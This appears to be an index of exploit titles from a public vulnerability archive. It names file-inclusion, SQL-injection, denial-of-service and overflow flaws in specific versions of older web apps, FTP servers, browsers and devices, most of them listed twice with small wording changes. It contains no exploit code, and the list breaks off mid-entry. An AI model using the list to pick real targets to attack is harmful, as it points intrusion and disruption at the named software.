MiniPort@l 0.1.5 beta (skiny) Remote File Inclusion
OPENi-CMS 1.0.1beta (config) Remote File Inclusion
mcGalleryPRO 2006 - (path_to_folder) Remote File Inclusion
MiniPort@l 0.1.5 beta - (skiny) Remote File Inclusion
OPENi-CMS 1.0.1beta - (config) Remote File Inclusion
Microsoft Internet Explorer (VML) Remote Denial of Service Exploit PoC
Microsoft Internet Explorer (VML) Remote Denial of Service PoC
OpenSSH 4.3 p1 - (Duplicated Block) Remote Denial of Service Exploit
OpenSSH 4.3 p1 - (Duplicated Block) Remote Denial of Service
VAMP Webmail 2.0beta1 - (yesno.phtml) Remote Include
VAMP Webmail 2.0beta1 - (yesno.phtml) Remote File Inclusion
TribunaLibre 3.12 Beta (ftag.php) Remote File Inclusion
TribunaLibre 3.12 Beta - (ftag.php) Remote File Inclusion
FreeBSD 5.4 / 6.0 - (ptrace PT_LWPINFO) Local Denial of Service Exploit
FreeBSD 5.4 / 6.0 - (ptrace PT_LWPINFO) Local Denial of Service
FreeBSD 6.1-RELEASE-p10 - (ftruncate) Local Denial of Service Exploit
FreeBSD 6.1-RELEASE-p10 - (scheduler) Local Denial of Service Exploit
FreeBSD 6.1-RELEASE-p10 - (ftruncate) Local Denial of Service
FreeBSD 6.1-RELEASE-p10 - (scheduler) Local Denial of Service
phpBB News Defilante Horizontale 4.1.1 - Remote Include Exploit
phpBB News Defilante Horizontale 4.1.1 - Remote File Inclusion Exploit
NuralStorm Webmail 0.98b (process.php) Remote Include
NuralStorm Webmail 0.98b (process.php) Remote File Inclusion
DigitalHive 2.0 RC2 - (base_include.php) Remote Include
DigitalHive 2.0 RC2 - (base_include.php) Remote File Inclusion
Xfire 1.6.4 - Remote Denial of Service Exploit (Perl)
Osprey 1.0 GetRecord.php Remote File Inclusion
Xfire 1.6.4 - Remote Denial of Service (Perl)
Osprey 1.0 - GetRecord.php Remote File Inclusion
MambWeather Mambo Module 1.8.1 - Remote Include
MambWeather Mambo Module 1.8.1 - Remote File Inclusion
QK SMTP 3.01 - (RCPT TO) Remote Denial of Service Exploit
QK SMTP 3.01 - (RCPT TO) Remote Denial of Service
FreeBSD 6.1 - (/dev/crypto) Local Kernel Denial of Service Exploit
FreeBSD 6.1 - (/dev/crypto) Local Kernel Denial of Service
RevilloC MailServer 1.x - (RCPT TO) Remote Denial of Service Exploit
RevilloC MailServer 1.x - (RCPT TO) Remote Denial of Service
PHPMyDesk 1.0beta (viewticket.php) Local File Inclusion Exploit
PHPMyDesk 1.0 beta - (viewticket.php) Local File Inclusion Exploit
Microsoft Windows NAT Helper Components (ipnathlp.dll) Remote DoS Exploit
Microsoft Windows NAT Helper Components (ipnathlp.dll) Remote Denial of Service
Microsoft Windows NAT Helper Components Remote DoS Exploit (perl)
Microsoft Windows NAT Helper Components Remote Denial of Service (perl)
GEPI 1.4.0 gestion/savebackup.php Remote File Inclusion
GEPI 1.4.0 - gestion/savebackup.php Remote File Inclusion
Mozilla Firefox 1.5.0.7/2.0 - (createRange) Remote DoS Exploit
Mozilla Firefox 1.5.0.7/2.0 - (createRange) Remote Denial of Service
Drake CMS < 0.2.3 ALPHA rev.916Remote File Inclusion
Drake CMS < 0.2.3 ALPHA rev.916 - Remote File Inclusion
XM Easy Personal FTP Server 5.2.1 - Remote Denial of Service Exploit
Essentia Web Server 2.15 - (GET Request) Remote DoS Exploit
XM Easy Personal FTP Server 5.2.1 - Remote Denial of Service
Essentia Web Server 2.15 - (GET Request) Remote Denial of Service
OpenLDAP 2.2.29 - Remote Denial of Service Exploit (Metasploit)
OpenLDAP 2.2.29 - Remote Denial of Service (Metasploit)
WarFTPd 1.82.00-RC11 - Remote Denial of Service Exploit
WarFTPd 1.82.00-RC11 - Remote Denial of Service
WORK System E-Commerce 3.0.1 - Remote Include
WORK System E-Commerce 3.0.1 - Remote File Inclusion
CMSmelborp Beta (user_standard.php) Remote File Inclusion Exploit
CMSmelborp Beta - (user_standard.php) Remote File Inclusion Exploit
phpPeanuts 1.3 Beta (Inspect.php) Remote File Inclusion
phpPeanuts 1.3 Beta - (Inspect.php) Remote File Inclusion
UniversalFTP 1.0.50 - (MKD) Remote Denial of Service Exploit
UniversalFTP 1.0.50 - (MKD) Remote Denial of Service
Microsoft Windows spoolss GetPrinterData() Remote DoS Exploit (0Day)
Microsoft Windows spoolss GetPrinterData() Remote Denial of Service (0Day)
awrate.com Message Board 1.0 - (search.php) Remote Include
awrate.com Message Board 1.0 - (search.php) Remote File Inclusion
F-Prot Antivirus 4.6.6 - (ACE) Denial of Service Exploit
F-Prot Antivirus 4.6.6 - (ACE) Denial of Service
Filezilla FTP Server 0.9.20b/0.9.21 - (STOR) Denial of Service Exploit
Filezilla FTP Server 0.9.20b/0.9.21 - (STOR) Denial of Service
Filezilla FTP Server 0.9.21 - (LIST/NLST) Denial of Service Exploit
D-Link DWL-2000AP 2.11 - (ARP Flood) Remote Denial of Service Exploit
Filezilla FTP Server 0.9.21 - (LIST/NLST) Denial of Service
D-Link DWL-2000AP 2.11 - (ARP Flood) Remote Denial of Service
Crob FTP Server 3.6.1 build 263 - (LIST/NLST) Denial of Service Exploit
Crob FTP Server 3.6.1 build 263 - (LIST/NLST) Denial of Service
Sambar FTP Server 6.4 - (SIZE) Remote Denial of Service Exploit
Windows Media Player 9/10 - (.MID) Denial of Service Exploit
Sambar FTP Server 6.4 - (SIZE) Remote Denial of Service
Windows Media Player 9/10 - (.MID) Denial of Service
Star FTP Server 1.10 - (RETR) Remote Denial of Service Exploit
Star FTP Server 1.10 - (RETR) Remote Denial of Service
Microsoft Office Outlook Recipient Control (ole32.dll) Denial of Service Exploit
wget 1.10.2 - (Unchecked Boundary Condition) Denial of Service Exploit
Microsoft Office Outlook Recipient Control (ole32.dll) Denial of Service
wget 1.10.2 - (Unchecked Boundary Condition) Denial of Service
WinFtp Server 2.0.2 - (PASV) Remote Denial of Service Exploit
WinFtp Server 2.0.2 - (PASV) Remote Denial of Service
RealPlayer 10.5 - (ActiveX Control) Denial of Service Exploit
RealPlayer 10.5 - (ActiveX Control) Denial of Service
DREAM FTP Server 1.0.2 - (PORT) Remote Denial of Service Exploit
DREAM FTP Server 1.0.2 - (PORT) Remote Denial of Service
inertianews 0.02b (inertianews_main.php) Remote Include
inertianews 0.02b (inertianews_main.php) Remote File Inclusion
XM Easy Personal FTP Server 5.2.1 - (USER) Format String DoS Exploit
XM Easy Personal FTP Server 5.2.1 - (USER) Format String Denial of Service
acFTP FTP Server 1.5 - (REST/PBSZ) Remote Denial of Service Exploit
acFTP FTP Server 1.5 - (REST/PBSZ) Remote Denial of Service
Microsoft Windows NetrWkstaUserEnum() Remote DoS Exploit (0Day)
Microsoft Windows NetrWkstaUserEnum() Remote Denial of Service (0Day)
RealPlayer 10.5 ierpplug.dll Internet Explorer 7 - Denial of Service Exploit
RealPlayer 10.5 ierpplug.dll Internet Explorer 7 - Denial of Service
Durian Web Application Server 3.02 - Denial of Service Exploit
Durian Web Application Server 3.02 - Denial of Service
Formbankserver 1.9 - (Name) Remote Denial of Service Exploit
Formbankserver 1.9 - (Name) Remote Denial of Service
Microsoft Windows - Explorer (WMF) CreateBrushIndirect DoS Exploit
Microsoft Windows - Explorer (WMF) CreateBrushIndirect Denial of Service
VLC Media Player 0.8.6a Unspecified Denial of Service Exploit
VLC Media Player 0.8.6a Unspecified Denial of Service
WFTPD Pro Server 3.25 SITE ADMN Remote Denial of Service Exploit
WFTPD Pro Server 3.25 SITE ADMN Remote Denial of Service
Twilight Webserver 1.3.3.0 - (GET) Remote Denial of Service Exploit
Colloquy 2.1.3545 - (INVITE) Format String Denial of Service Exploit
Twilight Webserver 1.3.3.0 - (GET) Remote Denial of Service
Colloquy 2.1.3545 - (INVITE) Format String Denial of Service
CCRP Folder Treeview Control (ccrpftv6.ocx) - IE Denial of Service Exploit
CCRP Folder Treeview Control (ccrpftv6.ocx) - IE Denial of Service
Sami HTTP Server 2.0.1 - (HTTP 404 Object not found) DoS Exploit
Sami HTTP Server 2.0.1 - (HTTP 404 Object not found) Denial of Service
Microsoft Windows - Explorer (AVI) Unspecified Denial of Service Exploit
Microsoft Windows - Explorer (AVI) Unspecified Denial of Service
Apple CFNetwork - HTTP Response Denial of Service Exploit (Ruby)
Apple CFNetwork - HTTP Response Denial of Service (Ruby)
CVSTrac 2.0.0 - Post-Attack Database Resurrection DoS Exploit
CVSTrac 2.0.0 - Post-Attack Database Resurrection Denial of Service
Apple iChat Bonjour 3.1.6.441 - Multiple Denial of Service Exploit
phpBB2 MODificat 0.2.0 - (functions.php) Remote Include
Apple iChat Bonjour 3.1.6.441 - Multiple Denial of Service
phpBB2 MODificat 0.2.0 - (functions.php) Remote File Inclusion
CA BrightStor ARCserve 11.5.2.0 - (catirpc.dll) RPC Server DoS Exploit
CA BrightStor ARCserve 11.5.2.0 - (catirpc.dll) RPC Server Denial of Service
Chicken of the VNC 2.0 - (NULL-pointer) Remote Denial of Service Exploit
Chicken of the VNC 2.0 - (NULL-pointer) Remote Denial of Service
FlashFXP 3.4.0 build 1145 - Remote Buffer Overflow DoS Exploit
SmartFTP Client 2.0.1002 - Remote Heap
Overflow DoS Exploit FlashFXP 3.4.0 build 1145 - Remote Buffer Overflow Denial of Service SmartFTP Client 2.0.1002 - Remote Heap Overflow Denial of Service Axigen 2.0.0b1 - Remote Denial of Service Exploit Axigen 2.0.0b1 - Remote Denial of Service Exploit (2) Axigen 2.0.0b1 - Remote Denial of Service Axigen 2.0.0b1 - Remote Denial of Service (2) phpCC 4.2 beta (nickpage.php npid) SQL Injection Exploit phpCC 4.2 beta - (nickpage.php npid) SQL Injection Exploit MiniWebsvr 0.0.6 - Remote Resource Consumption DoS Exploit MiniWebsvr 0.0.6 - Remote Resource Consumption Denial of Service MailEnable Professional/Enterprise 2.35 Out of Bounds DoS Exploit MailEnable Professional/Enterprise 2.35 Out of Bounds Denial of Service MailEnable Professional/Enterprise 2.37 - Denial of Service Exploit MailEnable Professional/Enterprise 2.37 - Denial of Service TurboFTP 5.30 Build 572 - (newline/LIST) Multiple Remote DoS Exploit TurboFTP 5.30 Build 572 - (newline/LIST) Multiple Remote Denial of Service PHP-Nuke 8.0 Final (INSERT) Blind SQL Injection Exploit (mysql) PHP-Nuke 8.0 Final (INSERT) SQL Injection Exploit PHP-Nuke 8.0 Final (HTTP Referers) SQL Injection Exploit FTP Explorer 1.0.1 Build 047 - (CPU consumption) Remote DoS Exploit PHP-Nuke 8.0 Final - (INSERT) Blind SQL Injection Exploit (mysql) PHP-Nuke 8.0 Final - (INSERT) SQL Injection Exploit PHP-Nuke 8.0 Final - (HTTP Referers) SQL Injection Exploit FTP Explorer 1.0.1 Build 047 - (CPU consumption) Remote Denial of Service BrowseDialog Class - (ccrpbds6.dll) Multiple Methods DoS Exploit BrowseDialog Class - (ccrpbds6.dll) Multiple Methods Denial of Service Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow DoS Exploit Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Denial of Service XM Easy Personal FTP Server 5.30 - (ABOR) Format String DoS Exploit XM Easy Personal FTP Server 5.30 - (ABOR) Format String Denial of Service DivX Web Player 1.3.0 - (npdivx32.dll) Remote Denial of Service Exploit DivX Web Player 
1.3.0 - (npdivx32.dll) Remote Denial of Service Asterisk 1.2.15 / 1.4.0 - pre-auth Remote Denial of Service Exploit Asterisk 1.2.15 / 1.4.0 - pre-auth Remote Denial of Service Konqueror 3.5.5 - (JavaScript Read of FTP Iframe) DoS Exploit Konqueror 3.5.5 - (JavaScript Read of FTP Iframe) Denial of Service Microsoft Windows - (.doc) Malformed Pointers Denial of Service Exploit Microsoft Windows - (.doc) Malformed Pointers Denial of Service TFTPDWIN Server 0.4.2 - (UDP) Denial of Service Exploit Rediff Toolbar ActiveX Control Remote Denial of Service Exploit Snort 2.6.1.1/2.6.1.2/2.7.0 - (fragementation) Remote DoS Exploit TFTPDWIN Server 0.4.2 - (UDP) Denial of Service Rediff Toolbar ActiveX Control Remote Denial of Service Snort 2.6.1.1/2.6.1.2/2.7.0 - (fragementation) Remote Denial of Service Microsoft Internet Explorer - (FTP Server Response) DoS Exploit (MS07-016) Microsoft Internet Explorer - (FTP Server Response) Denial of Service (MS07-016) TFTP Server 1.3 - Remote Buffer Overflow Denial of Service Exploit TFTP Server 1.3 - Remote Buffer Overflow Denial of Service MetaForum 0.513 Beta Remote File Upload Exploit MetaForum 0.513 Beta - Remote File Upload Exploit Cisco Phone 7940/7960 - (SIP INVITE) Remote Denial of Service Exploit Mercur IMAPD 5.00.14 - Remote Denial of Service Exploit (Win32) Cisco Phone 7940/7960 - (SIP INVITE) Remote Denial of Service Mercur IMAPD 5.00.14 - Remote Denial of Service (Win32) Grandstream Budge Tone-200 IP Phone (Digest domain) DoS Exploit Grandstream Budge Tone-200 IP Phone (Digest domain) Denial of Service 0irc-client 1345 build20060823 - Denial of Service Exploit 0irc-client 1345 build20060823 - Denial of Service Asterisk 1.2.16 / 1.4.1 - SIP INVITE Remote Denial of Service Exploit Asterisk 1.2.16 / 1.4.1 - SIP INVITE Remote Denial of Service sBLOG 0.7.3 Beta (inc/lang.php) Local File Inclusion Exploit IBM Lotus Domino Server 6.5 - (username) Remote Denial of Service Exploit sBLOG 0.7.3 Beta - (inc/lang.php) Local File 
Inclusion Exploit IBM Lotus Domino Server 6.5 - (username) Remote Denial of Service Wserve HTTP Server 4.6 - (Long Directory Name) Denial of Service Exploit Wserve HTTP Server 4.6 - (Long Directory Name) Denial of Service Microsoft Windows - Explorer Unspecified .ANI File Denial of Service Exploit Microsoft Windows - Explorer Unspecified .ANI File Denial of Service Gran Paradiso 3.0a3 non-existent applet Denial of Service Exploit Gran Paradiso 3.0a3 non-existent applet Denial of Service Sami HTTP Server 2.0.1 POST Request Denial of Service Exploit Sami HTTP Server 2.0.1 POST Request Denial of Service Ettercap-NG 0.7.3 - Remote Denial of Service Exploit Ettercap-NG 0.7.3 - Remote Denial of Service Mozzers SubSystem final (subs.php) Remote Code Execution Mozzers SubSystem final - (subs.php) Remote Code Execution Winamp 5.3 - (.WMV) Remote Denial of Service Exploit Winamp 5.3 - (.WMV) Remote Denial of Service Foxit Reader 2.0 - (PDF) Remote Denial of Service Exploit Foxit Reader 2.0 - (PDF) Remote Denial of Service Joomla 1.5.0 Beta (pcltar.php) Remote File Inclusion Winamp 5.33 - (.AVI) Remote Denial of Service Exploit Joomla 1.5.0 Beta - (pcltar.php) Remote File Inclusion Winamp 5.33 - (.AVI) Remote Denial of Service Opera 9.2 - (.torrent) Remote Denial of Service Exploit Opera 9.2 - (.torrent) Remote Denial of Service Linksys SPA941 \377 character Remote Denial of Service Exploit Linksys SPA941 - (remote reboot) Remote Denial of Service Exploit Linksys SPA941 \377 character Remote Denial of Service Linksys SPA941 - (remote reboot) Remote Denial of Service RealPlayer 10 - (.ra) Remote Denial of Service Exploit RealPlayer 10 - (.ra) Remote Denial of Service PowerPoint Viewer OCX 3.2 - (ActiveX Control) Denial of Service Exploit PowerPoint Viewer OCX 3.2 - (ActiveX Control) Denial of Service Excel Viewer OCX 3.1.0.6 - Multiple Methods Denial of Service Exploit Excel Viewer OCX 3.1.0.6 - Multiple Methods Denial of Service Word Viewer OCX 3.2 - Remote Denial of Service 
Exploit Word Viewer OCX 3.2 - Remote Denial of Service Office Viewer OCX 3.2.0.5 - Multiple Methods Denial of Service Exploit Office Viewer OCX 3.2.0.5 - Multiple Methods Denial of Service Versalsoft HTTP File Upload ActiveX 6.36 - (AddFile) Remote DoS Exploit Versalsoft HTTP File Upload ActiveX 6.36 - (AddFile) Remote Denial of Service Opera 9.10 alert() Remote Denial of Service Exploit Opera 9.10 alert() Remote Denial of Service SmartCode VNC Manager 3.6 - (scvncctrl.dll) Denial of Service Exploit SmartCode VNC Manager 3.6 - (scvncctrl.dll) Denial of Service SimpleNews 1.0.0 FINAL (print.php news_id) SQL Injection Exploit SimpleNews 1.0.0 FINAL - (print.php news_id) SQL Injection Exploit Remote Display Dev kit 1.2.1.0 RControl.dll Denial of Service Exploit Remote Display Dev kit 1.2.1.0 RControl.dll Denial of Service PrecisionID Barcode ActiveX 1.3 - Denial of Service Exploit PrecisionID Barcode ActiveX 1.3 - Denial of Service ID Automation Linear Barcode ActiveX Denial of Service Exploit ID Automation Linear Barcode ActiveX Denial of Service Microsoft Windows Vista - Forged ARP packet Network Stack DoS Exploit Microsoft Windows Vista - Forged ARP packet Network Stack Denial of Service BitsCast 0.13.0 - (invalid string) Remote Denial of Service Exploit NewzCrawler 1.8 - (invalid string) Remote Denial of Service Exploit BitsCast 0.13.0 - (invalid string) Remote Denial of Service NewzCrawler 1.8 - (invalid string) Remote Denial of Service PrecisionID Barcode ActiveX 1.9 - Remote Denial of Service Exploit PrecisionID Barcode ActiveX 1.9 - Remote Denial of Service CA BrightStor Backup 11.5.2.0 caloggderd.exe Denial of Service Exploit CA BrightStor Backup 11.5.2.0 Mediasvr.exe Denial of Service Exploit CA BrightStor Backup 11.5.2.0 caloggderd.exe Denial of Service CA BrightStor Backup 11.5.2.0 Mediasvr.exe Denial of Service Mambo com_yanc 1.4 beta (id) SQL Injection Mambo com_yanc 1.4 beta - (id) SQL Injection Microsoft IIS 6.0 - (/AUX/.aspx) Remote Denial of Service 
Exploit Microsoft IIS 6.0 - (/AUX/.aspx) Remote Denial of Service LeadTools ISIS Control - (ltisi14E.ocx v.14.5.0.44) Remote DoS Exploit LeadTools ISIS Control - (ltisi14E.ocx v.14.5.0.44) Remote Denial of Service Microsoft Office 2000 (OUACTRL.OCX 1.0.1.9) - Remote DoS Exploit Microsoft Office 2000 (OUACTRL.OCX 1.0.1.9) - Remote Denial of Service EDraw Office Viewer Component Denial of Service Exploit EDraw Office Viewer Component Denial of Service SNMPc 7.0.18 - Remote Denial of Service Exploit (Metasploit) SNMPc 7.0.18 - Remote Denial of Service (Metasploit) Microsoft Windows GDI+ - ICO File Remote Denial of Service Exploit Microsoft Windows GDI+ - ICO File Remote Denial of Service MiniWeb Http Server 0.8.x - Remote Denial of Service Exploit MiniWeb Http Server 0.8.x - Remote Denial of Service Safari 3 for Windows Beta Remote Command Execution PoC Safari 3 for Windows Beta - Remote Command Execution PoC BitchX 1.1-final (EXEC) Remote Command Execution Exploit BitchX 1.1-final - (EXEC) Remote Command Execution Exploit PHP 5.2.3 - bz2 com_print_typeinfo() Denial of Service Exploit PHP 5.2.3 - bz2 com_print_typeinfo() Denial of Service PHP 5.2.3 - glob() Denial of Service Exploit PHP 5.2.3 - glob() Denial of Service TeamSpeak 2.0 - (Windows Release) Remote Denial of Service Exploit TeamSpeak 2.0 - (Windows Release) Remote Denial of Service Microsoft Windows - Explorer.exe Gif Image Denial of Service Exploit Xserver 0.1 Alpha Post Request Remote Buffer Overflow Exploit Microsoft Windows - Explorer.exe Gif Image Denial of Service Xserver 0.1 Alpha - Post Request Remote Buffer Overflow Exploit Microsoft Internet Explorer 6 DirectX Media Remote Overflow DoS Exploit Microsoft Internet Explorer 6 DirectX Media Remote Overflow Denial of Service Cisco IOS Next Hop Resolution Protocol (NHRP) Denial of Service Exploit Cisco IOS Next Hop Resolution Protocol (NHRP) Denial of Service WengoPhone 2.x - SIP Phone Remote Denial of Service Exploit WengoPhone 2.x - SIP Phone Remote 
Denial of Service CounterPath X-Lite 3.x - SIP phone Remote Denial of Service Exploit CounterPath X-Lite 3.x - SIP phone Remote Denial of Service WireShark < 0.99.6 Mms Remote Denial of Service Exploit Easy Chat Server 2.2 - Remote Denial of Service Exploit WireShark < 0.99.6 Mms Remote Denial of Service Easy Chat Server 2.2 - Remote Denial of Service Cisco IP Phone 7940 - (3 SIP messages) Remote Denial of Service Exploit Cisco IP Phone 7940 - (10 SIP messages) Remote Denial of Service Exploit eCentrex VOIP Client module (uacomx.ocx 2.0.1) Remote BoF Exploit Cisco IP Phone 7940 - (3 SIP messages) Remote Denial of Service Cisco IP Phone 7940 - (10 SIP messages) Remote Denial of Service eCentrex VOIP Client module - (uacomx.ocx 2.0.1) Remote BoF Exploit Thomson SIP phone ST 2030 - Remote Denial of Service Exploit Thomson SIP phone ST 2030 - Remote Denial of Service Microsoft Windows - (GDI32.DLL) Denial of Service Exploit (MS07-046) Microsoft Windows - (GDI32.DLL) Denial of Service (MS07-046) JetCast Server 2.0.0.4308 - Remote Denial of Service Exploit JetCast Server 2.0.0.4308 - Remote Denial of Service actSite 1.991 Beta (base.php) Remote File Inclusion actSite 1.991 Beta - (base.php) Remote File Inclusion wzdftpd 0.8.0 - (USER) Remote Denial of Service Exploit wzdftpd 0.8.0 - (USER) Remote Denial of Service LiveAlbum 0.9.0 common.php Remote File Inclusion LiveAlbum 0.9.0 - common.php Remote File Inclusion eXtremail 2.1.1 memmove() Remote Denial of Service Exploit eXtremail 2.1.1 memmove() Remote Denial of Service GCALDaemon 1.0-beta13 - Remote Denial of Service Exploit GCALDaemon 1.0-beta13 - Remote Denial of Service Mozilla Firefox 2.0.0.7 - Remote Denial of Service Exploit Mozilla Firefox 2.0.0.7 - Remote Denial of Service Firefly Media Server 0.2.4 - Remote Denial of Service Exploit Ubuntu 6.06 DHCPd - Remote Denial of Service Exploit Firefly Media Server 0.2.4 - Remote Denial of Service Ubuntu 6.06 DHCPd - Remote Denial of Service patBBcode 1.0 
bbcodeSource.php Remote File Inclusion patBBcode 1.0 - bbcodeSource.php Remote File Inclusion RealPlayer 11 Malformed AU File Denial of Service Exploit RealPlayer 11 Malformed AU File Denial of Service Cisco Phone 7940 - Remote Denial of Service Exploit Cisco Phone 7940 - Remote Denial of Service Simple HTTPD 1.41 - (/aux) Remote Denial of Service Exploit Simple HTTPD 1.41 - (/aux) Remote Denial of Service SurgeMail 38k4 - webmail Host header Denial of Service Exploit SurgeMail 38k4 - webmail Host header Denial of Service Blakord Portal Beta 1.3.A (all modules) SQL Injection Blakord Portal Beta 1.3.A - (all modules) SQL Injection WebPortal CMS 0.6-beta Remote Password Change Exploit WebPortal CMS 0.6-beta - Remote Password Change Exploit Half-Life CSTRIKE Server 1.6 - Denial of Service Exploit (no-steam) Half-Life CSTRIKE Server 1.6 - Denial of Service (no-steam) Linux Kernel 2.6.21.1 - IPv6 Jumbo Bug Remote DoS Exploit Linux Kernel 2.6.21.1 - IPv6 Jumbo Bug Remote Denial of Service PHP-Nuke 8.0 Final (sid) SQL Injection Exploit PHP-Nuke 8.0 Final - (sid) SQL Injection Exploit Apple iPhone 1.1.2 - Remote Denial of Service Exploit Apple iPhone 1.1.2 - Remote Denial of Service MicroTik RouterOS 3.2 SNMPd snmp-set Denial of Service Exploit MicroTik RouterOS 3.2 SNMPd snmp-set Denial of Service Joomla Component MCQuiz 0.9 Final (tid) SQL Injection Joomla Component MCQuiz 0.9 Final - (tid) SQL Injection Apple iPhoto 4.0.3 DPAP Server Denial of Service Exploit Apple iPhoto 4.0.3 DPAP Server Denial of Service MyServer 0.8.11 - (204 No Content) error Remote Denial of Service Exploit MyServer 0.8.11 - (204 No Content) error Remote Denial of Service Galaxy FTP Server 1.0 - (Neostrada Livebox DSL Router) DoS Exploit Galaxy FTP Server 1.0 - (Neostrada Livebox DSL Router) Denial of Service ICQ Toolbar 2.3 - ActiveX Remote Denial of Service Exploit ICQ Toolbar 2.3 - ActiveX Remote Denial of Service Apple Safari (webkit) Remote Denial of Service Exploit (iphone/osx/win) Apple 
Safari (webkit) Remote Denial of Service (iphone/osx/win) Home FTP Server 1.4.5 - Remote Denial of Service Exploit Home FTP Server 1.4.5 - Remote Denial of Service PacketTrap Networks pt360 2.0.39 TFTPD - Remote DoS Exploit PacketTrap Networks pt360 2.0.39 TFTPD - Remote Denial of Service mxBB Module mx_blogs 2.0.0-beta Remote File Inclusion Exploit mxBB Module mx_blogs 2.0.0-beta - Remote File Inclusion Exploit Microsoft Windows - Explorer Unspecified .DOC File Denial of Service Exploit Microsoft Windows - Explorer Unspecified .DOC File Denial of Service Noticeware Email Server 4.6.1.0 - Denial of Service Exploit Noticeware Email Server 4.6.1.0 - Denial of Service Mcafee EPO 4.0 - FrameworkService.exe Remote Denial of Service Exploit Novel eDirectory HTTP - Denial of Service Exploit Mcafee EPO 4.0 - FrameworkService.exe Remote Denial of Service Novel eDirectory HTTP - Denial of Service XM Easy Personal FTP Server 5.4.0 - (XCWD) Denial of Service Exploit XM Easy Personal FTP Server 5.4.0 - (XCWD) Denial of Service e-107 Plugin zogo-shop 1.16 Beta 13 SQL Injection e-107 Plugin zogo-shop 1.16 Beta 13 - SQL Injection AlkalinePHP 0.80.00 beta (thread.php id) SQL Injection Exploit AlkalinePHP 0.80.00 beta - (thread.php id) SQL Injection Exploit Mambo Component mambads 1.0 RC1 Beta SQL Injection Mambo Component mambads 1.0 RC1 Beta - SQL Injection I-Pos Internet Pay Online Store 1.3 Beta SQL Injection I-Pos Internet Pay Online Store 1.3 Beta - SQL Injection P2P Foxy Out of Memory Denial of Service Exploit P2P Foxy Out of Memory Denial of Service uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 Range header DoS Exploit uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 Range header Denial of Service Simple DNS Plus 5.0/4.1 - Remote Denial of Service Exploit Simple DNS Plus 5.0/4.1 - Remote Denial of Service Yahoo Messenger 8.1 - ActiveX Remote Denial of Service Exploit Yahoo Messenger 8.1 - ActiveX Remote Denial of Service WinRemotePC Full+Lite 2008 r.2server Denial of Service 
Exploit WinRemotePC Full+Lite 2008 r.2server Denial of Service Bea Weblogic Apache Connector - Code Execution / Denial of Service Exploit Bea Weblogic Apache Connector - Code Execution / Denial of Service Oracle Internet Directory 10.1.4 - Remote Preauth DoS Exploit Oracle Internet Directory 10.1.4 - Remote Preauth Denial of Service F-PROT antivirus 6.2.1.4252 - (malformed archive) Infinite Loop DoS Exploit F-PROT antivirus 6.2.1.4252 - (malformed archive) Infinite Loop Denial of Service Xerox Phaser 8400 - (reboot) Remote Denial of Service Exploit Xerox Phaser 8400 - (reboot) Remote Denial of Service HydraIrc 0.3.164 - (last) Remote Denial of Service Exploit HydraIrc 0.3.164 - (last) Remote Denial of Service txtSQL 2.2 Final (startup.php) Remote File Inclusion txtSQL 2.2 Final - (startup.php) Remote File Inclusion Ventrilo 3.0.2 - NULL pointer Remote DoS Exploit Ventrilo 3.0.2 - NULL pointer Remote Denial of Service Google Chrome Browser 0.2.149.27 A HREF Denial of Service Exploit Google Chrome Browser 0.2.149.27 A HREF Denial of Service Google Chrome Browser 0.2.149.27 Inspect Element DoS Exploit Google Chrome Browser 0.2.149.27 Inspect Element Denial of Service Flock Social Web Browser 1.2.5 - (loop) Remote Denial of Service Exploit Flock Social Web Browser 1.2.5 - (loop) Remote Denial of Service Adobe Acrobat 9 - ActiveX Remote Denial of Service Exploit Adobe Acrobat 9 - ActiveX Remote Denial of Service The Personal FTP Server 6.0f RETR Denial of Service Exploit The Personal FTP Server 6.0f RETR Denial of Service Postfix < 2.4.9 / 2.5.5 / 2.6-20080902 - (.forward) Local DoS Exploit Postfix < 2.4.9 / 2.5.5 / 2.6-20080902 - (.forward) Local Denial of Service WonderWare SuiteLink 2.0 - Remote Denial of Service Exploit (Metasploit) WonderWare SuiteLink 2.0 - Remote Denial of Service (Metasploit) Femitter FTP Server 1.03 - (RETR) Remote Denial of Service Exploit PoC Femitter FTP Server 1.03 - (RETR) Remote Denial of Service PoC fhttpd 0.4.2 un64() - Remote Denial of 
Service Exploit fhttpd 0.4.2 un64() - Remote Denial of Service DESlock+ 3.2.7 - (vdlptokn.sys) Local Denial of Service Exploit DESlock+ 3.2.7 - (vdlptokn.sys) Local Denial of Service Vikingboard 0.2 Beta (task) Local File Inclusion Vikingboard 0.2 Beta - (task) Local File Inclusion Vikingboard 0.2 Beta SQL Column Truncation Vikingboard 0.2 Beta - SQL Column Truncation WinFTP Server 2.3.0 - (NLST) Denial of Service Exploit WinFTP Server 2.3.0 - (NLST) Denial of Service Chilkat IMAP ActiveX 7.9 - File Execution / IE DoS Exploit Chilkat IMAP ActiveX 7.9 - File Execution / IE Denial of Service Google Chrome 0.2.149.30 Window Object Suppressing DoS Exploit Google Chrome 0.2.149.30 Window Object Suppressing Denial of Service Opera 9.52 Window Object Suppressing Remote Denial of Service Exploit Microsoft Windows Explorer - (.zip) Denial of Service Exploit Opera 9.52 Window Object Suppressing Remote Denial of Service Microsoft Windows Explorer - (.zip) Denial of Service Autodesk DWF Viewer Control / LiveUpdate Module Remote Exploit Autodesk DWF Viewer Control / LiveUpdate Module - Remote Exploit VBA32 Personal Antivirus 3.12.8.x - (malformed archive) DoS Exploit VBA32 Personal Antivirus 3.12.8.x - (malformed archive) Denial of Service Skype extension for Firefox BETA 2.2.0.95 Clipboard Writing Skype extension for Firefox BETA 2.2.0.95 - Clipboard Writing WinFTP 2.3.0 - (PASV mode) Remote Denial of Service Exploit WinFTP 2.3.0 - (PASV mode) Remote Denial of Service NoticeWare E-mail Server 5.1.2.2 - (POP3) Pre-Auth DoS Exploit NoticeWare E-mail Server 5.1.2.2 - (POP3) Pre-Auth Denial of Service GuildFTPd 0.999.8.11/0.999.14 - Heap Corruption PoC/DoS Exploit GuildFTPd 0.999.8.11/0.999.14 - Heap Corruption PoC/Denial of Service XM Easy Personal FTP Server 5.6.0 - Remote Denial of Service Exploit RaidenFTPD 2.4 build 3620 - Remote Denial of Service Exploit XM Easy Personal FTP Server 5.6.0 - Remote Denial of Service RaidenFTPD 2.4 build 3620 - Remote Denial of Service Titan 
